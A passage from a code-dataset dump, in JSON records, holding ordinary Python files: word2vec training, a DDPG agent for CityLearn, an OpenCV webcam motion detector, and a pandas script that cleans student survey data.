connectivity among sentences. The connection between sentences is evaluated using the cosine\nsimilarities. Each sentence receives votes (connections with othersentences) and get a calculated score round by round, \nwhen the score of each sentence is no longer changing, we will output the ranked sentences. 
\n\n\n\n\n" }, { "alpha_fraction": 0.6927083134651184, "alphanum_fraction": 0.7526041865348816, "avg_line_length": 46.375, "blob_id": "1b40ac102c2d442fcece4649aaff6ba52e602fd1", "content_id": "50bf1fd81757ab7f22bcebea8343b8abf340839c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 384, "license_type": "no_license", "max_line_length": 103, "num_lines": 8, "path": "/word2vecModelTrainer.py", "repo_name": "NBsyxx/Extractive_Summerizer_on_Web", "src_encoding": "UTF-8", "text": "from gensim.models import word2vec\nimport logging\n\n\nlogging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)\nsentences = word2vec.LineSentence('Training_corpus/corpus_wiki_0.txt', max_sentence_length=100000)\nmodel = word2vec.Word2Vec(sentences, size=200, window=10, min_count=10, sg=1, hs=1, iter=15, workers=8)\nmodel.save('RealTrained.model')\n\n\n\n\n\n" }, { "alpha_fraction": 0.6660839319229126, "alphanum_fraction": 0.6818181872367859, "avg_line_length": 22.875, "blob_id": "bfee2537904e2304d69a10d1f40880fcc0208c5a", "content_id": "ef8a1157924f58c14e37d24ab94341eee71514d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 572, "license_type": "no_license", "max_line_length": 61, "num_lines": 24, "path": "/word2vec_test.py", "repo_name": "NBsyxx/Extractive_Summerizer_on_Web", "src_encoding": "UTF-8", "text": "from gensim.models import word2vec\nimport gensim.downloader as api\n\n\ndef print_closest_words(word):\n print(\"\\nWords close to \" + word)\n result = model.most_similar(word)\n for each in result:\n print(each[0], each[1])\n\n\n\nmodel = word2vec.Word2Vec.load(\"realTrained.model\")\nprint_closest_words('overwatch')\nprint_closest_words('Tracer')\nprint('\\n')\n\nresult = model.most_similar(positive=['light','electricity'])\nfor i in result:\n print(i[0],i[1])\nprint('\\n')\nresult = model.most_similar(positive=['fire','work','man'])\nfor i in result:\n print(i[0],i[1])" } ]
5
canteli/CityLearn
https://github.com/canteli/CityLearn
38dddbf07351767d8face9ad930b85bf09cf526f
e266951e3fd064e6eb01b7ae852d533300d952c0
e2bd2b287b63a1aa3e37647bc872b402bbb22600
refs/heads/master
2020-08-10T09:29:37.080828
2019-10-11T06:34:52
2019-10-11T06:34:52
214316558
0
0
MIT
2019-10-11T01:23:09
2019-10-09T14:07:44
2019-10-09T00:47:58
null
[ { "alpha_fraction": 0.5138514041900635, "alphanum_fraction": 0.5257849097251892, "avg_line_length": 37.46994400024414, "blob_id": "df02253bcf7a1154fecd98a304a0f3629a852f12", "content_id": "b9cfa9f6950267930cf2e74de4cd315b66f9bebd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7039, "license_type": "permissive", "max_line_length": 207, "num_lines": 183, "path": "/agent.py", "repo_name": "canteli/CityLearn", "src_encoding": "UTF-8", "text": "import torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport collections\nimport numpy as np\nimport random\nimport copy\n\nclass DDPGActor(nn.Module):\n def __init__(self, obs_size, act_size):\n super(DDPGActor, self).__init__()\n\n self.net = nn.Sequential(\n nn.Linear(obs_size, 4),\n nn.ReLU(),\n nn.Linear(4, 4),\n nn.ReLU(),\n nn.Linear(4, act_size),\n nn.Tanh()\n )\n\n def forward(self, x):\n return self.net(x)\n\nclass DDPGCritic(nn.Module):\n def __init__(self, obs_size, act_size):\n super(DDPGCritic, self).__init__()\n\n self.obs_net = nn.Sequential(\n nn.Linear(obs_size, 8),\n nn.ReLU(),\n )\n\n self.out_net = nn.Sequential(\n nn.Linear(8 + act_size, 6),\n nn.ReLU(),\n nn.Linear(6, 1)\n )\n\n def forward(self, x, a):\n obs = self.obs_net(x)\n return self.out_net(torch.cat([obs, a], dim=1))\n \nclass TargetNet:\n \"\"\"\n Wrapper around model which provides copy of it instead of trained weights\n \"\"\"\n def __init__(self, model):\n self.model = model\n self.target_model = copy.deepcopy(model)\n\n def sync(self):\n self.target_model.load_state_dict(self.model.state_dict())\n\n def alpha_sync(self, alpha):\n \"\"\"\n Blend params of target net with params from the model\n :param alpha:\n \"\"\"\n assert isinstance(alpha, float)\n assert 0.0 < alpha <= 1.0\n state = self.model.state_dict()\n tgt_state = self.target_model.state_dict()\n for k, v in state.items():\n tgt_state[k] = tgt_state[k] * alpha + (1 - alpha) * v\n self.target_model.load_state_dict(tgt_state)\n \n \nclass Batch:\n def __init__(self):\n self.batch = []\n \n def append_sample(self, sample):\n self.batch.append(sample)\n \n def sample(self, sample_size):\n s, a, r, s_next = [],[],[],[]\n \n if sample_size > len(self.batch):\n sample_size = len(self.batch)\n \n rand_sample = random.sample(self.batch, sample_size)\n for values in rand_sample:\n s.append(values[0])\n a.append(values[1])\n r.append(values[2])\n s_next.append(values[3])\n return torch.tensor(s,dtype=torch.float32), torch.tensor(a,dtype=torch.float32), torch.tensor(r,dtype=torch.float32), torch.tensor(s_next,dtype=torch.float32)\n \n def __len__(self):\n return len(self.batch)\n \n \nclass RL_Agents:\n def __init__(self, observation_spaces = None, action_spaces = None):\n self.device = \"cpu\"\n self.epsilon = 1.2\n self.n_buildings = len(observation_spaces)\n self.batch = {}\n self.frame_idx = {}\n for i in range(len(observation_spaces)):\n self.batch[i] = Batch()\n \n LEARNING_RATE_ACTOR = 1e-4\n LEARNING_RATE_CRITIC = 1e-3\n self.MIN_REPLAY_MEMORY = 100\n self.BATCH_SIZE = 2400\n self.EPOCHS = 6\n self.GAMMA = 0.99\n self.EPSILON_FINAL = 0.01\n self.EPSILON_START = 1.2\n self.EPSILON_DECAY_LAST_FRAME = 5000\n self.hour_idx = 0\n \n i = 0\n self.act_net, self.crt_net, self.tgt_act_net, self.tgt_crt_net, self.act_opt, self.crt_opt = {}, {}, {}, {}, {}, {}\n for o, a in zip(observation_spaces, action_spaces):\n self.act_net[i] = DDPGActor(o.shape[0], a.shape[0]).to(self.device)\n self.crt_net[i] = 
DDPGCritic(o.shape[0], a.shape[0]).to(self.device)\n self.tgt_act_net[i] = TargetNet(self.act_net[i])\n self.tgt_crt_net[i] = TargetNet(self.crt_net[i])\n self.act_opt[i] = optim.Adam(self.act_net[i].parameters(), lr=LEARNING_RATE_ACTOR)\n self.crt_opt[i] = optim.Adam(self.crt_net[i].parameters(), lr=LEARNING_RATE_CRITIC)\n i += 1\n \n def select_action(self, states):\n i, actions = 0, []\n for state in states:\n a = 0.5*self.act_net[i](torch.tensor(state))\n a = a.cpu().detach().numpy() + self.epsilon * 0.5 * np.random.normal(size=a.shape)\n a = np.clip(a, -0.5, 0.5)\n actions.append(a)\n i += 1\n return actions\n \n def add_to_batch(self, states, actions, rewards, next_states):\n i = 0\n for s, a, r, s_next in zip(states, actions, rewards, next_states):\n self.batch[i].append_sample((s, a, r, s_next))\n i += 1\n \n batch, states_v, actions_v, rewards_v, dones_mask, states_next_v, q_v, last_act_v, q_last_v, q_ref_v, critic_loss_v, cur_actions_v, actor_loss_v = {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {} \n \n self.epsilon = max(self.EPSILON_FINAL, self.EPSILON_START - self.hour_idx / self.EPSILON_DECAY_LAST_FRAME)\n self.hour_idx += 1\n for i in range(self.n_buildings):\n if len(self.batch[i]) > self.MIN_REPLAY_MEMORY:\n for k in range(self.EPOCHS):\n states_v[i], actions_v[i], rewards_v[i], states_next_v[i] = self.batch[i].sample(self.BATCH_SIZE)\n\n # TRAIN CRITIC\n self.crt_opt[i].zero_grad()\n #Obtaining Q' using critic net with parameters teta_Q'\n q_v[i] = self.crt_net[i](states_v[i], actions_v[i])\n\n #Obtaining estimated optimal actions a|teta_mu from target actor net and from s_i+1.\n last_act_v[i] = self.tgt_act_net[i].target_model(states_next_v[i]) #<----- Actor to train Critic\n\n #Obtaining Q'(s_i+1, a|teta_mu) from critic net Q'\n q_last_v[i] = self.tgt_crt_net[i].target_model(states_next_v[i], last_act_v[i])\n# q_last_v[i][dones_mask[i]] = 0.0\n\n #Q_target used to train critic net Q'\n q_ref_v[i] = rewards_v[i].unsqueeze(dim=-1) + q_last_v[i] * self.GAMMA\n critic_loss_v[i] = F.mse_loss(q_v[i], q_ref_v[i].detach())\n critic_loss_v[i].backward()\n self.crt_opt[i].step()\n\n # TRAIN ACTOR\n self.act_opt[i].zero_grad()\n #Obtaining estimated optimal current actions a|teta_mu from actor net and from s_i\n cur_actions_v[i] = self.act_net[i](states_v[i])\n\n #Actor loss = mean{ -Q_i'(s_i, a|teta_mu) }\n actor_loss_v[i] = -self.crt_net[i](states_v[i], cur_actions_v[i]) #<----- Critic to train Actor\n actor_loss_v[i] = actor_loss_v[i].mean()\n #Find gradient of the loss and backpropagate to perform the updates of teta_mu\n actor_loss_v[i].backward()\n self.act_opt[i].step()\n\n self.tgt_act_net[i].alpha_sync(alpha=1 - 0.1)\n self.tgt_crt_net[i].alpha_sync(alpha=1 - 0.1)" }, { "alpha_fraction": 0.5636363625526428, "alphanum_fraction": 0.5727272629737854, "avg_line_length": 9, "blob_id": "ebcf105293838e02dc8a8e3dac93f8c869416dc6", "content_id": "5b9716e760b8ed7495d13413daaa88d81f888abd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": true, "language": "reStructuredText", "length_bytes": 110, "license_type": "permissive", "max_line_length": 16, "num_lines": 11, "path": "/docs/_build/html/_sources/modules.rst.txt", "repo_name": "canteli/CityLearn", "src_encoding": "UTF-8", "text": "CityLearn\n=========\n\n.. toctree::\n :maxdepth: 4\n\n agents\n citylearn\n common\n energy_models\n model\n" } ]
2
matmss/pycomputervisionAI
https://github.com/matmss/pycomputervisionAI
79a7c03f52b9e4b34409b667ee95f350bad82996
c1855184e9efd97060396f61c1715e2bc2883bc9
8089e57a9bc381c22aad1105dbae9c166b6e7e47
refs/heads/master
2021-05-20T11:30:17.723350
2020-07-01T20:42:39
2020-07-01T20:42:39
252257909
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6428571343421936, "alphanum_fraction": 0.7857142686843872, "avg_line_length": 27, "blob_id": "33004c2d8a025fb8a60ab5a748bfa3ff82fa1092", "content_id": "e699e7b2283d06af28fcb428b1c8d59c870789d0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 28, "license_type": "permissive", "max_line_length": 27, "num_lines": 1, "path": "/alwaysai/realtime_object_detector/Dockerfile", "repo_name": "matmss/pycomputervisionAI", "src_encoding": "UTF-8", "text": "FROM alwaysai/edgeiq:0.13.0\n" }, { "alpha_fraction": 0.5776465535163879, "alphanum_fraction": 0.5942694544792175, "avg_line_length": 40.563636779785156, "blob_id": "3380a639e27cc51553447fadc24f6d8f40d48572", "content_id": "36f05842004b80cec4bc61507bf098f1014c239c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4572, "license_type": "permissive", "max_line_length": 128, "num_lines": 110, "path": "/detect1.txt", "repo_name": "matmss/pycomputervisionAI", "src_encoding": "UTF-8", "text": "import cv2.cv as cv\nfrom datetime import datetime\nimport time\n\nclass MotionDetector():\n\n def onChange(self, val): #callback when the user change the ceil\n self.ceil = val\n\n def __init__(self,ceil=8, doRecord=True, showWindows=True):\n self.writer = None\n self.font = None\n self.doRecord=doRecord #Either or not record the moving object\n self.show = showWindows #Either or not show the 2 windows\n self.frame = None\n\n self.capture=cv.CaptureFromCAM(0)\n self.frame = cv.QueryFrame(self.capture) #Take a frame to init recorder\n if doRecord:\n self.initRecorder()\n\n self.frame1gray = cv.CreateMat(self.frame.height, self.frame.width, cv.CV_8U) #Gray frame at t-1\n cv.CvtColor(self.frame, self.frame1gray, cv.CV_RGB2GRAY)\n\n #Will hold the thresholded result\n self.res = cv.CreateMat(self.frame.height, self.frame.width, cv.CV_8U)\n\n self.frame2gray = cv.CreateMat(self.frame.height, self.frame.width, cv.CV_8U) #Gray frame at t\n\n self.width = self.frame.width\n self.height = self.frame.height\n self.nb_pixels = self.width * self.height\n self.ceil = ceil\n self.isRecording = False\n self.trigger_time = 0 #Hold timestamp of the last detection\n\n if showWindows:\n cv.NamedWindow(\"Image\")\n cv.CreateTrackbar(\"Mytrack\", \"Image\", self.ceil, 100, self.onChange)\n\n def initRecorder(self): #Create the recorder\n codec = cv.CV_FOURCC('D', 'I', 'V', 'X')\n #codec = cv.CV_FOURCC(\"D\", \"I\", \"B\", \" \")\n self.writer=cv.CreateVideoWriter(datetime.now().strftime(\"%b-%d_%H:%M:%S\")+\".avi\", codec, 15, cv.GetSize(self.frame), 1)\n #FPS set at 15 because it seems to be the fps of my cam but should be ajusted to your needs\n self.font = cv.InitFont(cv.CV_FONT_HERSHEY_SIMPLEX, 1, 1, 0, 2, 8) #Creates a font\n\n def run(self):\n started = time.time()\n while True:\n\n curframe = cv.QueryFrame(self.capture)\n instant = time.time() #Get timestamp o the frame\n\n self.processImage(curframe) #Process the image\n\n if not self.isRecording:\n if self.somethingHasMoved():\n self.trigger_time = instant #Update the trigger_time\n if instant > started +5:#Wait 5 second after the webcam start for luminosity adjusting etc..\n print \"Something is moving !\"\n if self.doRecord: #set isRecording=True only if we record a video\n self.isRecording = True\n else:\n if instant >= self.trigger_time +10: #Record during 10 seconds\n print \"Stop recording\"\n self.isRecording = False\n else:\n 
cv.PutText(curframe,datetime.now().strftime(\"%b %d, %H:%M:%S\"), (25,30),self.font, 0) #Put date on the frame\n cv.WriteFrame(self.writer, curframe) #Write the frame\n\n if self.show:\n cv.ShowImage(\"Image\", curframe)\n cv.ShowImage(\"Res\", self.res)\n\n cv.Copy(self.frame2gray, self.frame1gray)\n c=cv.WaitKey(1)\n if c==27 or c == 1048603: #Break if user enters 'Esc'.\n break\n\n def processImage(self, frame):\n cv.CvtColor(frame, self.frame2gray, cv.CV_RGB2GRAY)\n\n #Absdiff to get the difference between to the frames\n cv.AbsDiff(self.frame1gray, self.frame2gray, self.res)\n\n #Remove the noise and do the threshold\n cv.Smooth(self.res, self.res, cv.CV_BLUR, 5,5)\n element = cv.CreateStructuringElementEx(5*2+1, 5*2+1, 5, 5, cv.CV_SHAPE_RECT)\n cv.MorphologyEx(self.res, self.res, None, None, cv.CV_MOP_OPEN)\n cv.MorphologyEx(self.res, self.res, None, None, cv.CV_MOP_CLOSE)\n cv.Threshold(self.res, self.res, 10, 255, cv.CV_THRESH_BINARY_INV)\n\n def somethingHasMoved(self):\n nb=0 #Will hold the number of black pixels\n\n for y in range(self.height): #Iterate the hole image\n for x in range(self.width):\n if self.res[y,x] == 0.0: #If the pixel is black keep it\n nb += 1\n avg = (nb*100.0)/self.nb_pixels #Calculate the average of black pixel in the image\n #print \"Average: \",avg, \"%\\r\",\n if avg > self.ceil:#If over the ceil trigger the alarm\n return True\n else:\n return False\n\nif __name__==\"__main__\":\n detect = MotionDetector(doRecord=False)\n detect.run()\n" }, { "alpha_fraction": 0.8285714387893677, "alphanum_fraction": 0.8285714387893677, "avg_line_length": 51.5, "blob_id": "b9b994b656b37bee49e463b417810e4293b24904", "content_id": "2da58775172431a3eba7deaec53b6af467178287", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 105, "license_type": "permissive", "max_line_length": 83, "num_lines": 2, "path": "/README.md", "repo_name": "matmss/pycomputervisionAI", "src_encoding": "UTF-8", "text": "# pycomputervisionAI\nA computer vision project using python to track movement, applying AI in the future\n" } ]
3
MatteoGaleone/Matrice-Correlazioni
https://github.com/MatteoGaleone/Matrice-Correlazioni
b3cc288a0113b0ad4a0886c2b7b9e4d5959ad10a
33ac5dfde0b312b3c860041b5440212a9a465142
292e21bbb61a90bbbcdbb723a0dc8c4c82f1e8bf
refs/heads/main
2023-06-08T01:02:03.195537
2021-07-05T13:59:06
2021-07-05T13:59:06
382299003
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5621033310890198, "alphanum_fraction": 0.5729827880859375, "avg_line_length": 27.28205108642578, "blob_id": "76cc38e56b759a4aabbd53a8b8df0fda9c759b93", "content_id": "e7fafcdb2f63bc803229f34496aa51d664b742ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1103, "license_type": "no_license", "max_line_length": 91, "num_lines": 39, "path": "/Correlazioni.py", "repo_name": "MatteoGaleone/Matrice-Correlazioni", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport yfinance as yf\n\ndef CalcolaMatrice(N):\n DF=pd.DataFrame()\n p=str(input('inserire i numero di periodi da considerare + y/mo/d, es: 5mo '))\n for i in range(1, N+1) :\n t=str(input(\"Inserire il ticker del prodotto: \"))\n Dataset= yf.Ticker(t)\n DF[t]=Dataset.history(period=p)['Close']\n return DF\n\ndef Programma():\n while True:\n N=int(input('Numero di asset da confrontare: '))\n DF=CalcolaMatrice(N)\n plt.figure(figsize=(10,8), dpi=150)\n sns.heatmap(DF.corr(), cmap='RdYlGn', linecolor='black', linewidth=0.1, annot=True)\n return plt.show()\n plt.clf()\n while True:\n risposta = str(input('Vuoi visualizzare una nuova matrice? (si/no): '))\n if risposta in ('si', 'no'):\n break\n print('Input non valido.')\n if risposta == 'si':\n continue\n else:\n print('Ciao')\n break\n\nProgramma()\n" } ]
1
lvillatoroq/apis
https://github.com/lvillatoroq/apis
6e506ccb4cad4f0ad888f2e0b739f27233be4181
1016393855033a5e8bfbba34c9d44ff4da6cbae2
cb989cb62442ecc855eea24445c434980f890d4c
refs/heads/master
2021-01-10T07:43:33.553262
2016-04-05T13:03:56
2016-04-05T13:03:56
55508218
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8095238208770752, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 20, "blob_id": "6f7026ca944d11d0ce9b62151ce7a46c631257ea", "content_id": "f98aa36eada2b111b8970e0ea2c81747ecb8481b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 42, "license_type": "no_license", "max_line_length": 34, "num_lines": 2, "path": "/README.md", "repo_name": "lvillatoroq/apis", "src_encoding": "UTF-8", "text": "# apis\nAPI created for different projects\n" }, { "alpha_fraction": 0.4854070544242859, "alphanum_fraction": 0.4992319643497467, "avg_line_length": 33.26315689086914, "blob_id": "1fdb981bb1620235d713ae4d264373ba61b0ac51", "content_id": "6e137709c6bd00cb1dce920f1f4e3e0d8e4dce29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 651, "license_type": "no_license", "max_line_length": 106, "num_lines": 19, "path": "/gps_api.py", "repo_name": "lvillatoroq/apis", "src_encoding": "UTF-8", "text": "from flask import Flask, jsonify\nimport gps\n\napp = Flask(__name__)\n\[email protected]('/gps/api/v1/location', methods=['GET'])\ndef get_gps():\n session = gps.gps(\"localhost\", \"2947\")\n session.stream(gps.WATCH_ENABLE | gps.WATCH_NEWSTYLE)\n while True:\n report = session.next()\n if report['class'] == 'TPV':\n if hasattr(report, 'time'):\n return jsonify(clock=report.time,longitude=report.lon,latitude=report.lat)\n #session.close()\n break\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n" } ]
2
DataMiningUCV/preprocesamiento-de-datos-josseline06
https://github.com/DataMiningUCV/preprocesamiento-de-datos-josseline06
80efea7065d21643121d7782d4b1c2e1145fe2f8
a264e402edf584be0a3e4dcf8e68eebbb20a12bf
4666c5ea08f3919147158f0024e6cfa493064e8f
refs/heads/master
2021-01-10T18:01:40.464736
2016-01-18T07:04:15
2016-01-18T07:04:15
48598043
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6797794103622437, "alphanum_fraction": 0.7027015089988708, "avg_line_length": 40.744606018066406, "blob_id": "41b519ceae40790ac3d417f6f405748393a8d6f3", "content_id": "bcb3c4dffa220bbce43cb3863f5b2ccc5e01ca88", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23399, "license_type": "no_license", "max_line_length": 306, "num_lines": 556, "path": "/src/preprocessed.py", "repo_name": "DataMiningUCV/preprocesamiento-de-datos-josseline06", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom datetime import date\nimport re, os, numpy, pandas\n\n\"\"\"\n --- Cargando datos ---\n * El proyecto debe correrse desde el directorio base\n * output_data almacena la data luego del procesamiento\n \n\"\"\"\nproject = os.getcwd()\ninput_data = pandas.read_csv(project+'/dat/data.csv', header=None, skiprows=1)\noutput_data = pandas.DataFrame(\n\tcolumns=['ID', 'PeriodY', 'PeriodN', 'Age', 'Birthday', 'CivilStatus', 'Gender', 'School', 'AdmissionY', 'AdmissionM', \n\t'Average', 'Efficiency', 'Semester', 'Enrolled', 'Approved', 'Withdrawals', 'Failed', 'ReasonOfFailed', 'Subjects',\n\t'EnrollThesis', 'Origin', 'Residence', 'Roommates', 'ChangeAddress', 'HousingType', 'Breadwinner', 'FamilyLoad', \n\t'BreadwinnerIncome', 'BreadwinnerOthersIncomes', 'BreadwinnerTotalIncome', 'BreadwinnerFood', 'BreadwinnerTransportation', \n\t'BreadwinnerMedical', 'BreadwinnerDental', 'BreadwinnerStudy', 'Services', 'Condominium', 'BreadwinnerOtherExpenses', \n\t'BreadwinnerTotalExpenses', 'FinancialAid', 'Work', 'Scolarship', 'InputBreadwinner', 'Family', 'InputWork', 'TotalIncome', \n\t'Food', 'Transportation', 'Medical', 'Dental', 'Personal', 'Rental', 'AuxRentalColumn','Study', 'Entertainment', \n\t'OtherExpenses', 'TotalExpenses', 'Rating']\n\t)\n\n\"\"\"\n --- Cédula ---\n * El identificador de c/u de las instancias\n \n\"\"\"\noutput_data.ID = input_data[2].drop_duplicates()\n\n\"\"\"\n --- Período académico ---\n 1. Eliminando separadores entre número de período y año (pueden der espacio, '-', '/' y '\\')\n 2. Separando período (que se compone de año y número) en las columnas PeriodY y PeriodoN respectivamente\n\t2.1. Tomando los períodos que cumplan con el formato <número><año> \n\t2.2. Tomando los períodos que cumplan con el formato <año><número>\n\t2.3. Juntando (2) y (3) en un mismo dataframe\n 3. Transformación de la columna PeriodN\n 4. Transformación de la columna PeriodY\n 5. 
Inputación de datos erróneos o faltantes con la moda\n\t\n\"\"\" \n# Paso 1\nperiod_messy = input_data[1].str.replace('[\\s\\\\\\\\\\-\\/]','') \n\n# Paso 2.1: extrae en los grupos year y number (c/u en distintas columnas) las cadenas con de forma <año><número>\nperiod = period_messy.str.extract('^(?P<year>(?:20)?\\d{2})(?P<number>pri(?:mero)?|seg(?:undo)?|ii?|0?[12]s?)$', re.I)\n\n# Paso 2.2: extrae en los grupos year y number (c/u en distintas columnas) las cadenas con de forma <número><año>\nperiod_p2 = period_messy.str.extract('^(?P<number>pri(?:mero)?|seg(?:undo)?|ii?|0?[12]s?)(?P<year>(?:20)?\\d{2})$', re.I)\n\n# Paso 2.3: Se juntan en un mismo data frame los posibles casos (intersección es nula por lo que no hay pérdida de datos)\nperiod.update(period_p2)\n\n# Paso 3: Transformación de los números de período a enteros {1,2}\noutput_data.PeriodN = period.number.str.lower().replace([r'pri(mero)?|i|0?1s|01s?', r'seg(undo)?|ii|0?2s|02s?'], [1,2], regex=True)\n\n# Paso 4: Transformación de los años, todos con 4 dígitos\n# Se decide imputar el valor de los años expresado en 2 dígitos en el siglo XXI dado que el dataset no muestra ningún registro\n# de que los valores puedan estar en alguna otra época \noutput_data.PeriodY = period.year.str.replace('^\\d{2}$', lambda x: '20'+x.group(0))\n\n# Paso 5\noutput_data.PeriodN = output_data.PeriodN.fillna(output_data.PeriodN.mode().iloc[0])\noutput_data.PeriodY = output_data.PeriodY.fillna(output_data.PeriodY.mode().iloc[0]).astype('int')\n\n\"\"\"\n --- Edad ---\n 1. Casteo de la edad a entero\n\t\n\"\"\"\noutput_data.Age = input_data[4].str.replace('^(\\d{1,2})[^0-9]+', lambda x: x.group(1)).astype('int')\n\n\"\"\"\n --- Fecha de nacimiento ---\n 1. Transformación de la fecha a años con 4 dígitos\n 2. Transformación de la fecha a formato yyyy-mm-dd\n 3. Inputar datos erróneos o faltantes con el (año del período académico - edad)\n\t\n\"\"\"\ncurrent_year = date.today().strftime('%y')\n\n# Paso 1: función lambda evalua si 2 digitos de año > año actual => el año es del siglo XX sino el año es del siglo XXI\noutput_data.Birthday = input_data[3].str.replace('^\\d{1,2}[\\s/-]?\\d{1,2}[\\s/-]?\\d{2}$', lambda x: ['%s19%s'%(b,a) if a>current_year else '%s20%s'%(b,a) for b in [x.group(0)[:-2]] for a in [x.group(0)[-2:]]][0])\n\n# Paso 2\noutput_data.Birthday = pandas.to_datetime(output_data.Birthday, dayfirst=True, errors='coerce')\n\n# Paso 3\noutput_data.Birthday = output_data.apply(lambda x: pandas.to_datetime('%d/01/01' % (x.PeriodY-x.Age)) if pandas.isnull(x.Birthday) else x.Birthday, axis=1)\n\n\"\"\"\n --- Estado civil ---\n 1. Limpiar series, en el que los valores posibles serán {soltero(a), casado(a), viudo(a)}\n 2. Codificar las categorías {soltero: 0, casado: 1, viudo: 2}\n 3. Imputar datos erróneos o faltantes con la moda\n\t\n\"\"\"\n# Paso 1 y 2\noutput_data.CivilStatus = input_data[5].str.lower().replace([r'^soltero.*', r'^casado.*', r'^viudo.*', r'.*'], [0, 1, 2, numpy.nan], regex=True)\n\n# Paso 3\noutput_data.CivilStatus = output_data.CivilStatus.fillna(output_data.CivilStatus.mode().iloc[0])\n\n\"\"\"\n --- Sexo ---\n 1. Limpiar series, en el que los valores posibles serán {femenino, masculino}\n 2. Codificar las categorías {femenino: 0, masculino: 1}\n 3. 
Imputar datos erróneos o faltantes con la moda\n\t\n\"\"\"\n# Paso 1 y 2\noutput_data.Gender = input_data[6].str.lower().replace([r'^f(?:emenino)?', r'^m(?:asculino)?', r'.*'], [0, 1, numpy.nan] , regex=True)\n\n# Paso 3\noutput_data.Gender = output_data.Gender.fillna(output_data.Gender.mode().iloc[0])\n\n\"\"\"\n --- Escuela ---\n 1. Limpiar series, en el que los valores posibles serán {enfermería, bioanálisis}\n 2. Codificar las categorías {enfermería: 0, bioanálisis: 1}\n 3. Imputar datos erróneos o faltantes con la moda\n\t\n\"\"\"\n# Paso 1 y 2\noutput_data.School = input_data[7].str.lower().replace(['enfermería', 'bioanálisis', r'.*'], [0, 1, numpy.nan], regex=True)\n\n# Paso 3\noutput_data.School = output_data.School.fillna(output_data.School.mode().iloc[0])\n\n\"\"\"\n --- Año de ingreso ---\n 1. En caso de años con 2 dígitos, llevarlos a 4\n\t\n\"\"\"\noutput_data.AdmissionY = input_data[8].apply(lambda x: x if x>=1900 else (x+1900 if x>int(current_year) else x+2000))\n\n\"\"\"\n --- Modalidad de ingreso ---\n 1. Limpiar series, en el que los valores posibles serán {interinstitucionales, prueba interna, internos, opsu}\n 2. Codificar las categorías {interinstitucionales: 0, prueba interna: 1, internos: 2, opsu: 3}\n 3. Imputar datos erróneos o faltantes con la moda\n\t\n\"\"\"\n# Paso 1 y 2\noutput_data.AdmissionM = input_data[9].str.replace('\\s','').str.lower()\noutput_data.AdmissionM = output_data.AdmissionM.replace([r'.*interinstitucional(es)?.*', r'^pruebainterna.*', r'^internos.*', r'.*opsu.*', r'.*'], [0, 1, 2, 3, numpy.nan], regex=True)\n\n# Paso 3\noutput_data.AdmissionM = output_data.AdmissionM.fillna(output_data.AdmissionM.mode().iloc[0])\n\n\"\"\"\n --- Promedio ponderado ---\n 1. Limpiar series, en el que los valores posibles serán entre {0, 20}\n 2. Imputar datos erróneos o faltantes con la media\n\t\n\"\"\"\n# Paso 1\noutput_data.Average = input_data[17].apply(lambda x: float(x) if x>=0 and x<=20 else (float(x)/1000.0 if x>=1000 and x<=20000 else numpy.nan))\n\n# Paso 2\noutput_data.Average = output_data.Average.fillna(output_data.Average.mean())\n\n\"\"\"\n --- Eficiencia ---\n 1. Limpiar series, en el que los valores posibles serán entre {0, 1}\n 2. Imputar datos erróneos o faltantes con la media\n\t\n\"\"\"\n# Paso 1\noutput_data.Efficiency = input_data[18].apply(lambda x: float(x) if x>=0 and x<=1 else (float(x)/10000.0 if x>=1000 and x<=10000 else numpy.nan))\n\n# Paso 2\noutput_data.Efficiency = output_data.Efficiency.fillna(output_data.Efficiency.mean())\n\n\"\"\"\n --- Semestre ---\n 1. Limpiar series, en el que los valores posibles sean numéricos y entre {1,10}\n 2. Imputar datos erróneos con la moda\n\t\n\"\"\"\n# Paso 1 \noutput_data.Semester = input_data[10].str.replace('^(\\d{1,2}).*', lambda x: x.group(1)).astype('int')\noutput_data.Semester = output_data.Semester.apply(lambda x: x if x>0 and x<=10 else numpy.nan)\n\n# Paso 2\noutput_data.Semester = output_data.Semester.fillna(output_data.Semester.mode().iloc[0])\n\n\"\"\"\n --- Materias inscritas, aprobadas, retiradas y reprobadas del semestre anterior ---\n 1. Limpiar series, en el que los valores posibles sean numéricos\n 2. 
